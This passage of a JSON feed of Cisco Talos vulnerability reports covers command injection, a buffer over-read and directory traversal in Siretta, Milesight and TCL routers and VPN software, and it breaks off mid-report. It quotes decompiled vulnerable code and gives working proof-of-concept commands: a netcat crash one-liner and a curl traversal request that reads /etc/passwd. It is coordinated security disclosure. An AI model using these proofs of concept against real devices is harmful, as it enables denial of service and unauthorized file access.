5.9}, "published": "2018-10-16T00:00:00", "type": "talos", "title": "Linksys ESeries multiple OS command injection vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-3953", "CVE-2018-3954", "CVE-2018-3955"], "modified": "2018-10-16T00:00:00", "id": "TALOS-2018-0625", "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2018-0625", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-12-02T18:55:49", "description": "# Talos Vulnerability Report\n\n### TALOS-2022-1640\n\n## Siretta QUARTZ-GOLD m2m m2m_parse_router_config cmd OS command injection vulnerabilities\n\n##### January 26, 2023\n\n##### CVE Number\n\nCVE-2022-42492,CVE-2022-42491,CVE-2022-42493,CVE-2022-42490\n\n##### SUMMARY\n\nSeveral OS command injection vulnerabilities exist in the m2m binary of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted network request can lead to arbitrary command execution. An attacker can send a network request to trigger these vulnerabilities.\n\n##### CONFIRMED VULNERABLE VERSIONS\n\nThe versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.\n\nSiretta QUARTZ-GOLD G5.0.1.5-210720-141020\n\n##### PRODUCT URLS\n\nQUARTZ-GOLD - <https://www.siretta.com/products/industrial-routers/4g-lte-router/gigabit-ethernet-small-footprint-lte-router-eu/>\n\n##### CVSSv3 SCORE\n\n9.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n\n##### CWE\n\nCWE-78 - Improper Neutralization of Special Elements used in an OS Command (\u2018OS Command Injection\u2019)\n\n##### DETAILS\n\nThe Siretta QUARTZ-GOLD is an industrial router with several functionalities and services, such as: SSH, UPNP, VPN, SNMP and many others.\n\nThe QUARTZ-GOLD offers a feature called `M2M`. When enabled, the device will execute the `m2m` binary and offer different network services. One of the services the `m2m` binary offers handles several commands. To communicate with this service the client must send a specific UDP packet format.\n\nSeveral commands use the `m2m_parse_router_config` function:\n \n \n uint m2m_parse_router_config(char *data,uint data_len)\n \n {\n [...]\n \n memset(nvram_command,0,0x800);\n memset(param,0,0x400);\n syslog(5,\"----parse_router_config %d:%s----\",data_len,data);\n syslog(5,\"----NVRAM Set Command Start----\");\n len_first_no_& = strspn(data,\"&\");\n strncpy(param,data + len_first_no_&,0x400);\n first_& = strcspn(param,\"&\" );\n param[first_&] = '\\0';\n local_19 = 0;\n pcVar1 = strchr(data + len_first_no_&,L'&');\n while (param[0] != '\\0') {\n memset(nvram_command,0,0x800);\n sprintf(nvram_command,\"nvram set %s\",param); [1]\n syslog(5,\"%s\",nvram_command);\n system(nvram_command); [2]\n [...]\n \n\nThis function will parse data in the UDP packet received. The command expects a list that looks like: `<nvram_key_1>=<nvram_value_1>&<nvram_key_2>=<nvram_value_2>....`. Then, for each key value pair, it will compose at `[1]` the `nvram set <nvram_key>=<nvram_value>`. The composed string will be used as argument for the `system` function at `[2]`. The problem is that from receiving the command packet to `[2]` the data is never sanitized. This allows any string to be used as argument of the `system` call. This can lead to an OS command injection.\n\nFollowing is the list of the vulnerable commands that will call the `m2m_parse_router_config` function.\n\n#### CVE-2022-42490 - DOWNLOAD_CFG_FILE command injection\n\nFollowing is the portion of `m2m` binary that manages the `DOWNLOAD_CFG_FILE` command:\n \n \n syslog(5,\"M2M Command(%02x) DOWNLOAD_CFG_FILE!!!\",0x16);\n [...]\n data_len = __bswap_16(UDP_data_buff.data_len;\n syslog(5,\"DOWNLOAD_CFG_FILE %d:%s\",\n data_len),\n &UDP_data_buff.data);\n temp = m2m_parse_router_config(&UDP_data_buff.data, data_len);\n [...] \n \n\nThe command will call the `m2m_parse_router_config` function with the provided `UDP_data_buff.data`, which is an array of characters, and `UDP_data_buff.data_len`, its length. This will lead to a command injection vulnerability.\n\n#### CVE-2022-42491 - M2M_CONFIG_SET command injection\n\nFollowing is the portion of `m2m` binary that manages the `M2M_CONFIG_SET` command:\n \n \n syslog(5,\"M2M Command(%02x) M2M_CONFIG_SET!!!\",6);\n [...]\n data_len = __bswap_16(UDP_data_buff.data_len;\n syslog(5,\"M2M_CONIFG_SET %d:%s\",\n data_len,\n &UDP_data_buff.data);\n global_UDP_packet = m2m_parse_router_config(&UDP_data_buff.data,data_len);\n [...]\n \n\nThe command will call the `m2m_parse_router_config` function with the provided `UDP_data_buff.data`, which is an array of characters, and `UDP_data_buff.data_len`, its length. This will lead to a command injection vulnerability.\n\n#### CVE-2022-42492 - DOWNLOAD_AD command injection\n\nFollowing is the portion of `m2m` binary that manages the `DOWNLOAD_AD` command:\n \n \n syslog(5,\"M2M Command(%02x) DOWNLOAD_AD!!!\",0xe);\n [...]\n data_len = __bswap_16(UDP_data_buff.data_len;\n syslog(5,\"M2M_CONIFG_SET %d:%s\",\n data_len,\n &UDP_data_buff.data);\n if (DOWNLOAD_THREAD_STARTED == 0) {\n global_UDP_packet = m2m_parse_router_config(&UDP_data_buff.data,data_len);\n [...]\n \n\nThe command will call the `m2m_parse_router_config` function with the provided `UDP_data_buff.data`, which is an array of characters, and `UDP_data_buff.data_len`, its length. This will lead to a command injection vulnerability.\n\n#### CVE-2022-42493 - DOWNLOAD_INFO command injection\n\nFollowing is the portion of `m2m` binary that manages the `DOWNLOAD_INFO` command:\n \n \n syslog(5,\"M2M Command(%02x) DOWNLOAD_INFO!!!\",0xc);\n [...]\n data_len = __bswap_16(UDP_data_buff.data_len;\n syslog(5,\"M2M_CONIFG_SET %d:%s\",\n data_len,\n &UDP_data_buff.data);\n nvram_unset(\"type\");\n temp = m2m_parse_router_config(&UDP_data_buff.data, data_len);\n [...]\n \n\nThe command will call the `m2m_parse_router_config` function with the provided `UDP_data_buff.data`, which is an array of characters, and `UDP_data_buff.data_len`, its length. This will lead to a command injection vulnerability.\n\n##### TIMELINE\n\n2022-10-14 - Initial Vendor Contact\n\n2022-10-20 - Vendor Disclosure\n\n2022-11-24 - Vendor Patch Release\n\n2023-01-26 - Public Release\n\n##### Credit\n\nDiscovered by Francesco Benvenuto of Cisco Talos.\n\n* * *\n\nVulnerability Reports Next Report\n\nTALOS-2022-1682\n\nPrevious Report\n\nTALOS-2022-1637\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-26T00:00:00", "type": "talos", "title": "Siretta QUARTZ-GOLD m2m m2m_parse_router_config cmd OS command injection vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-42490", "CVE-2022-42491", "CVE-2022-42492", "CVE-2022-42493"], "modified": "2023-01-26T00:00:00", "id": "TALOS-2022-1640", "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1640", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-08T19:04:35", "description": "# Talos Vulnerability Report\n\n### TALOS-2023-1696\n\n## Milesight UR32L eventcore access violation vulnerability\n\n##### July 6, 2023\n\n##### CVE Number\n\nCVE-2023-23571\n\n##### SUMMARY\n\nAn access violation vulnerability exists in the eventcore functionality of Milesight UR32L v32.3.0.5. A specially crafted network request can lead to denial of service. An attacker can send a network request to trigger this vulnerability.\n\n##### CONFIRMED VULNERABLE VERSIONS\n\nThe versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.\n\nMilesight UR32L v32.3.0.5\n\n##### PRODUCT URLS\n\nUR32L - <https://www.milesight-iot.com/cellular/router/ur32l/>\n\n##### CVSSv3 SCORE\n\n7.5 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\n\n##### CWE\n\nCWE-126 - Buffer Over-read\n\n##### DETAILS\n\nThe Milesight UR32L is an industrial cellular router. The router features include support for multiple VPNs, a router console shell, firewall and many others.\n\nThe router can be set up to trigger an action after a particular event occurs. For instance, it is possible to send an e-mail or an SMS after a device reboots. Other actions and events exist. The binary that actually performs the action, after a particular event occurs, is `eventcore`.\n\nThe `eventcore` binary has a thread that waits for data that seems to be used to query the SQLite3 database used to archive the various event-related information. Following the `recv_data_thread` function that manages the reception of the data:\n \n \n undefined4 recv_data_thread(int *socket)\n \n {\n [... variable declaration ...]\n \n [... variable initialization ...]\n memset(chunk_buff + 4,0,0x1fc);\n [... variable initialization ...]\n \n if (socket == (int *)0x0) {\n syslog(3,\"param is null\\n\");\n }\n else {\n socket_ = *socket;\n if (socket_ < 1) {\n syslog(3,\"udp fd less than 0.\\n\");\n }\n else {\n message = (char *)malloc_and_memset(0x800);\n if (message != (char *)0x0) {\n memset(message,0,0x800);\n do {\n while( true ) {\n memset(chunk_buff,0,0x200);\n message_strlen = strlen(message);\n recv_length = recv_wrap(socket_,chunk_buff,0x1ff,&src_addr); [1]\n if ((chunk_buff[0] == '\\0') || (recv_length != 0x1ff)) break;\n memcpy(message + message_strlen,chunk_buff,0x800 - message_strlen); [2]\n }\n [...]\n }\n }\n [...]\n }\n \n\nThe function executes a loop where it received at most 0x1ff bytes into the `chunk_buff` buffer, then the content of the `chunk_buff` is appended into the `message` buffer.\n\nThe `chunk_buff` buffer is correctly sized with 512 bytes available, so the read at `[1]` is correct. At `[2]` the `memcpy` copies the size `0x800 - message_strlen` from `chunk_buff` into `message`. So, the first `memcpy` will copy 0x800 bytes from a buffer of 0x1ff bytes. This leads to a buffer over-read. Furthermore, the thread starts with a fresh stack, which implies that the stack buffer `chunk_buff` is close to end of the stack and a buffer over-read will cause a SIGSEGV.\n\nDebugging the process, it is easy to understand this problem:\n \n \n memcpy@plt ( \n $r0 = 0x00043730 \u2192 0x00000000, \n $r1 = 0x76de4b0c \u2192 \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]\", \n $r2 = 0x00000800, \n ) The `$r2` register contains the address of the `chunk_buff` buffer; in this case, it is `0x76de4b0c`. Following the thread stack region and the region adjacent:\n \n 0x76bf0000 0x76de5000 0x00000000 rw-\n 0x76de5000 0x76de6000 0x00000000 --- \n \n\nThe bytes between `chunk_buff`, at `0x76de4b0c`, and the end of thread\u2019s stack region, at `0x76de5000`, is 0x4f4 bytes. So, reading 0x800 bytes from `chunk_buff` implies it will try to access outside the stack region.\n\n### Crash Information\n \n \n Thread 5 \"eventcore\" received signal SIGSEGV, Segmentation fault.\n 0x76f3d540 in memcpy () from target:/lib/ld-musl-armhf.so.1\n [ Legend: Modified register | Code | Heap | Stack | String ]\n \u2500\u2500\u2500\u2500 registers \u2500\u2500\u2500\u2500 \n $r0 : 0x76ef2a20 \u2192 0x00000000\n $r1 : 0x76d67ffc \u2192 0x00000000\n $r2 : 0x2f0\n $r3 : 0x10\n $r4 : 0x0\n $r5 : 0x0\n $r6 : 0x0\n $r7 : 0x0\n $r8 : 0x0\n $r9 : 0x0\n $r10 : 0x0\n $r11 : 0x0\n $r12 : 0x0\n $sp : 0x76d67ac8 \u2192 0x76f417ac \u2192 ldr r3, [r0, #140] ; 0x8c\n $lr : 0x00012e7c \u2192 0xea000034 (\"4\"?)\n $pc : 0x76f3d540 \u2192 <memcpy+140> ldm r1!, {r4, r5, r6, r7, r8, r9, r10, r11}\n $cpsr: [negative zero CARRY overflow interrupt fast thumb]\n \u2500\u2500\u2500\u2500 stack \u2500\u2500\u2500\u2500 \n 0x76d67ac8\u2502+0x0000: 0x76f417ac \u2192 ldr r3, [r0, #140] ; 0x8c \u2190 $sp\n 0x76d67acc\u2502+0x0004: 0x76d67d44 \u2192 0x76d67d44 \u2192 [loop detected]\n 0x76d67ad0\u2502+0x0008: 0x00000078 (\"x\"?)\n 0x76d67ad4\u2502+0x000c: 0x7eac7d34 \u2192 0x00000000\n 0x76d67ad8\u2502+0x0010: 0x76f68540 \u2192 0x00000000\n 0x76d67adc\u2502+0x0014: 0x76d67d44 \u2192 0x76d67d44 \u2192 [loop detected]\n 0x76d67ae0\u2502+0x0018: 0x76d67d24 \u2192 0x76f41830 \u2192 bl 0x76f41628 <pthread_exit>\n 0x76d67ae4\u2502+0x001c: 0x76ef2530 \u2192 \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]\"\n \u2500\u2500\u2500\u2500 code:arm:ARM \u2500\u2500\u2500\u2500 \n 0x76f3d534 <memcpy+128> sub r2, r2, r3\n 0x76f3d538 <memcpy+132> subs r2, r2, #32\n 0x76f3d53c <memcpy+136> bcc 0x76f3d554 <memcpy+160>\n \u2192 0x76f3d540 <memcpy+140> ldm r1!, {r4, r5, r6, r7, r8, r9, r10, r11}\n 0x76f3d544 <memcpy+144> subs r2, r2, #32\n 0x76f3d548 <memcpy+148> stmia r0!, {r4, r5, r6, r7, r8, r9, r10, r11}\n 0x76f3d54c <memcpy+152> bcs 0x76f3d540 <memcpy+140>\n 0x76f3d550 <memcpy+156> add r2, r2, #32\n 0x76f3d554 <memcpy+160> tst r2, #31\n \u2500\u2500\u2500\u2500 threads \u2500\u2500\u2500\u2500 \n [#0] Id 1, Name: \"eventcore\", stopped 0x76f40174 in __clone (), reason: SIGSEGV\n [#1] Id 2, Name: \"eventcore\", stopped 0x76f40174 in __clone (), reason: SIGSEGV\n [#2] Id 3, Name: \"eventcore\", stopped 0x76f40174 in __clone (), reason: SIGSEGV\n [#3] Id 4, Name: \"eventcore\", stopped 0x76f40174 in __clone (), reason: SIGSEGV\n [#4] Id 5, Name: \"eventcore\", stopped 0x76f3d540 in memcpy (), reason: SIGSEGV\n \u2500\u2500\u2500\u2500 trace \u2500\u2500\u2500\u2500 \n [#0] 0x76f3d540 \u2192 memcpy()\n [#1] 0x12e7c \u2192 b 0x12f54\n \n\n### Exploit Proof of Concept\n\nExecuting the following bash command will result in the crash of the `eventcore` binary:\n \n \n echo `python -c \"print('A'*0x1ff)\"` | nc -u <ROUTER_IP> 9001\n \n\n##### VENDOR RESPONSE\n\nSince the maintainer of this software did not release a patch during the 90 day window specified in our policy, we have now decided to release the information regarding this vulnerability, to make users of the software aware of this problem. See Cisco\u2019s Coordinated Vulnerability Disclosure Policy for more information: https://tools.cisco.com/security/center/resources/vendor_vulnerability_policy.html\n\n##### TIMELINE\n\n2023-02-14 - Initial Vendor Contact \n2023-02-21 - Vendor Disclosure \n2023-07-06 - Public Release\n\n##### Credit\n\nDiscovered by Francesco Benvenuto of Cisco Talos.\n\n* * *\n\nVulnerability Reports Next Report\n\nTALOS-2023-1697\n\nPrevious Report\n\nTALOS-2023-1724\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2023-07-06T00:00:00", "type": "talos", "title": "Milesight UR32L eventcore access violation vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-23571"], "modified": "2023-07-06T00:00:00", "id": "TALOS-2023-1696", "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2023-1696", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-11-08T19:04:40", "description": "# Talos Vulnerability Report\n\n### TALOS-2023-1702\n\n## Milesight MilesightVPN server.js start directory traversal vulnerability\n\n##### July 6, 2023\n\n##### CVE Number\n\nCVE-2023-23907\n\n##### SUMMARY\n\nA directory traversal vulnerability exists in the server.js start functionality of Milesight VPN v2.0.2. A specially-crafted network request can lead to arbitrary file read. An attacker can send a network request to trigger this vulnerability.\n\n##### CONFIRMED VULNERABLE VERSIONS\n\nThe versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.\n\nMilesight VPN v2.0.2\n\n##### PRODUCT URLS\n\nMilesightVPN - <https://www.milesight-iot.com/milesightvpn/>\n\n##### CVSSv3 SCORE\n\n7.5 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n\n##### CWE\n\nCWE-22 - Improper Limitation of a Pathname to a Restricted Directory (\u2018Path Traversal\u2019)\n\n##### DETAILS\n\nThe MilesightVPN is software that make the process easier of setting up the VPN tunnel for Milesight products, as well as allows monitoring the connection status with a web server interface.\n\nThe MilesightVPN\u2019s `server.js` file has the `start` function that is the one responsible to manage the received requests:\n \n \n function start(route,handle,connection,generateToken,verifyToken,lang){\n const options={\n key:fs.readFileSync(path.join(__dirname,'./https/server.key')),\n cert:fs.readFileSync(path.join(__dirname,'./https/server.crt'))\n };\n var defaultpage={\n page:'index.html',\n login:'login.html',\n port:'18080',\n ssl_port:'18443'\n };\n disconnect(connection);\n [...]\n https.createServer(options,function(req,res){\n var method=req.method;\n var pathname=url.parse(req.url).pathname;\n [...]\n var ext=path.parse(pathname).ext;\n ext=ext.slice(1);\n [...]\n var realPath=path.join(__dirname,'../'+pathname);\n var cookie=req.headers.cookie;\n if(cookie)\n {\n [...]\n }\n else\n {\n if(ext=='html'&&(pathname.indexOf('login.html')<0&&pathname.indexOf('Device_Auth')<0))\n {\n [...]\n }\n }\n \n if(method=='POST')\n {\n [...]\n }\n else\n {\n [...]\n if(ext=='html')\n {\n [...]\n }\n fs.readFile(realPath,function(err,data){ [1]\n [...]\n var contentType='';\n switch(ext){\n case 'html':\n contentType='text/html';\n break;\n [...]\n default:\n contentType='text/plain';\n }\n res.writeHead(200,{'Content-Type':contentType});\n res.end(data);\n });\n }\n \n \n }).listen(defaultpage.ssl_port);\n }\n \n\nThe function perform a series of check in the case the requested page extensions is html and in the case a cookie is provided. But, if the file does not have such extension and no cookie is provided, eventually, the code at `[1]` is reached and because no checks is performed against the provided path, this function is vulnerable to an unauthenticated directory path traversal.\n\n### Exploit Proof of Concept\n\nFollowing a POC for the vulnerability exposed above:\n \n \n $ curl --path-as-is --insecure https://<SERVER_ADDRESS>/../etc/passwd \n \n root:x:0:0:root:/root:/bin/bash\n daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n bin:x:2:2:bin:/bin:/usr/sbin/nologin\n sys:x:3:3:sys:/dev:/usr/sbin/nologin\n sync:x:4:65534:sync:/bin:/bin/sync\n games:x:5:60:games:/usr/games:/usr/sbin/nologin\n man:x:6:12:man:/var/cache/man:/usr/sbin/nologin\n lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\n mail:x:8:8:mail:/var/mail:/usr/sbin/nologin\n news:x:9:9:news:/var/spool/news:/usr/sbin/nologin\n uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\n proxy:x:13:13:proxy:/bin:/usr/sbin/nologin\n www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n backup:x:34:34:backup:/var/backups:/usr/sbin/nologin\n list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\n irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin\n gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin\n nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin\n systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin\n systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin\n messagebus:x:103:106::/nonexistent:/usr/sbin/nologin\n syslog:x:104:110::/home/syslog:/usr/sbin/nologin\n _apt:x:105:65534::/nonexistent:/usr/sbin/nologin\n tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false\n uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin\n tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin\n sshd:x:109:65534::/run/sshd:/usr/sbin/nologin\n landscape:x:110:115::/var/lib/landscape:/usr/sbin/nologin\n pollinate:x:111:1::/var/cache/pollinate:/bin/false\n vagrant:x:1000:1000:,,,:/home/vagrant:/bin/bash\n systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin\n ubuntu:x:1001:1001:Ubuntu:/home/ubuntu:/bin/bash\n lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false\n vboxadd:x:997:1::/var/run/vboxadd:/bin/false\n fwupd-refresh:x:112:119:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin\n mysql:x:113:120:MySQL Server,,,:/nonexistent:/bin/false\n redis:x:1002:1002::/home/redis:/bin/false\n stund:x:1003:1003::/home/stund:/bin/false\n tunnel:x:1004:1004::/bin:/bin/false\n \n\nThe request\u2019s response is the `/etc/passwd` content.\n\n##### VENDOR RESPONSE\n\nSince the maintainer of this software did not release a patch during the 90 day window specified in our policy, we have now decided to release the information regarding this vulnerability, to make users of the software aware of this problem. See Cisco\u2019s Coordinated Vulnerability Disclosure Policy for more information: https://tools.cisco.com/security/center/resources/vendor_vulnerability_policy.html\n\n##### TIMELINE\n\n2023-02-14 - Initial Vendor Contact \n2023-02-21 - Vendor Disclosure \n2023-07-06 - Public Release\n\n##### Credit\n\nDiscovered by Francesco Benvenuto of Cisco Talos.\n\n* * *\n\nVulnerability Reports Next Report\n\nTALOS-2023-1701\n\nPrevious Report\n\nTALOS-2023-1723\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2023-07-06T00:00:00", "type": "talos", "title": "Milesight MilesightVPN server.js start directory traversal vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-23907"], "modified": "2023-07-06T00:00:00", "id": "TALOS-2023-1702", "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2023-1702", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-12-02T16:52:36", "description": "# Talos Vulnerability Report\n\n### TALOS-2022-1458\n\n## TCL LinkHub Mesh Wifi confsrv ucloud_add_node OS command injection vulnerability\n\n##### August 1, 2022\n\n##### CVE Number\n\nCVE-2022-22140\n\n##### SUMMARY\n\nAn os command injection vulnerability exists in the confsrv ucloud_add_node functionality of TCL LinkHub Mesh Wi-Fi MS1G_00_01.00_14. A specially-crafted network packet can lead to arbitrary command execution. An attacker can send a malicious packet to trigger this vulnerability.\n\n##### CONFIRMED VULNERABLE VERSIONS\n\nThe versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.\n\nTCL LinkHub Mesh Wifi MS1G_00_01.00_14\n\n##### PRODUCT URLS\n\nLinkHub Mesh Wifi - <https://www.tcl.com/us/en/products/connected-home/linkhub/linkhub-mesh-wifi-system-3-pack>\n\n##### CVSSv3 SCORE\n\n9.6 - CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\n\n##### CWE\n\nCWE-78 - Improper Neutralization of Special Elements used in an OS Command (\u2018OS Command Injection\u2019)\n\n##### DETAILS\n\nThe LinkHub Mesh Wi-Fi system is a node-based mesh system designed for Wi-Fi deployments across large homes. These nodes include most features standard in current Wi-Fi solutions and allow for easy expansion of the system by adding nodes. The mesh is managed solely by a phone application, and the routers have no web-based management console.\n\nThe LinkHub Mesh system uses protobuffers to communicate both internally on the device as well as externally with the controlling phone application. These protobuffers can be sent to port 9003 while on the Wi-Fi provided by the LinkHub Mesh in order to issue commands, much like the phone application would. Once the protobuffer is received, it is routed internally starting from the `ucloud` binary and is dispatched to the appropriate handler.\n\nIn this case, the handler is `confsrv`, which handles many message types. In this case we are interested in `MxpManageList`.\n \n \n message MxpManage {\n required string serialNum = 1; [1]\n required int32 opt = 2;\n }\n message MxpManageList {\n repeated MxpManage mxp = 1; //This is not optional, so it must be resolved by hand to compile to .proto //This is not optional, so it must be resolved by hand to compile to .proto\n optional uint64 timestamp = 2;\n } \n \n\nUsing [1] we have control over the `serialNum` in the packet. The parsing of the data within the protobuffer is `ucloud_add_node`.\n \n \n 00428478 int32_t ucloud_add_node(int32_t arg1, int32_t arg2, int32_t arg3) \n 00428498 arg_0 = arg1\n 004284a4 int32_t $a3\n 004284a4 arg_c = $a3\n 004284a8 int32_t var_12c = 0\n 004284ac int32_t var_130 = 0\n 004284cc void var_128\n 004284cc memset(&var_128, 0, 0x100)\n 004284d8 int32_t var_28 = 0\n 004284dc int32_t var_24 = 0\n 004284e0 int32_t var_20 = 0\n 004284e4 int32_t var_1c = 0\n 004284e8 int32_t var_18 = 0\n 004284ec int32_t var_14 = 0\n 004284f0 int32_t var_10 = 0\n 004284f4 int32_t var_c = 0\n 004284fc int32_t $v0_1\n 004284fc if (arg2 == 0) {\n 00428524 _td_snprintf(3, \"api/map_manage.c\", 0x737, \" in is null ! \\n\", 0x4ae4b0)\n 00428530 $v0_1 = 0xffffffff\n 00428530 } else {\n 00428558 struct MxpManageList* $v0_3 = mxp_manage_list__unpack(0, arg3, arg2)\n 0042856c if ($v0_3 == 0) {\n 00428594 _td_snprintf(3, \"api/map_manage.c\", 0x73d, \" unpack failed ! \\n\", 0x4ae4b0)\n 004285a0 $v0_1 = 0xffffffff\n 004285a0 } else {\n 004286b0 for (uint32_t var_130_1 = 0; var_130_1 u< $v0_3->mxp_manage_count; var_130_1 = var_130_1 + 1) {\n 004285d0 if (confctl_module_debug_en(module_id: 9) != 0) {\n 00428618 printf(\"\\x1b[1;32m[%s][%d] : \\x1b[0m\\x1b\u2026\", \"ucloud_add_node\", 0x743, *(*($v0_3->p_mxp + (var_130_1 << 2)) + 0xc), 0x4ae4b0)\n 00428494 }\n 0042864c update_add_node_list(serial_number: *(*($v0_3->p_mxp + (var_130_1 << 2)) + 0xc))\n 00428688 doSystemCmd(\"echo %s >> /proc/mesh/authorized\", *(*($v0_3->p_mxp + (var_130_1 << 2)) + 0xc)) [2]\n 00428670 }\n 004286c0 if ($v0_3->is_timestamp_present != 0) {\n 004286f0 sprintf(&var_28, \"%llu\", $v0_3->timestamp.d, $v0_3->timestamp:4.d, 0x4ae4b0)\n 00428714 SetValue(name: \"sys.cfg.stamp\", input_buffer: &var_28)\n 00428708 }\n 00428728 CommitCfm()\n 00428744 mxp_manage_list__free_unpacked($v0_3, 0)\n 00428750 $v0_1 = 0\n 00428750 }\n 00428750 }\n 00428764 return $v0_1 \n \n\nAt [2] the `serialNum` is used directly in `doSystemCmd`.\n \n \n 000209b0 int32_t doSystemCmd(int32_t arg1, int32_t arg2) \n 000209d0 arg_4 = arg2\n 000209d4 int32_t $a2\n 000209d4 arg_8 = $a2\n 000209d8 int32_t $a3\n 000209d8 arg_c = $a3\n 000209fc void var_408\n 000209fc memset(&var_408, 0, 0x400)\n 00020a30 log_debug_print(\"doSystemCmd\", &data_1b8d, 0, 0x80, 0x55500) {\"function entry!\"}\n 00020a64 vsnprintf(&var_408, 0x400, arg1, &arg_4)\n 00020a80 int32_t 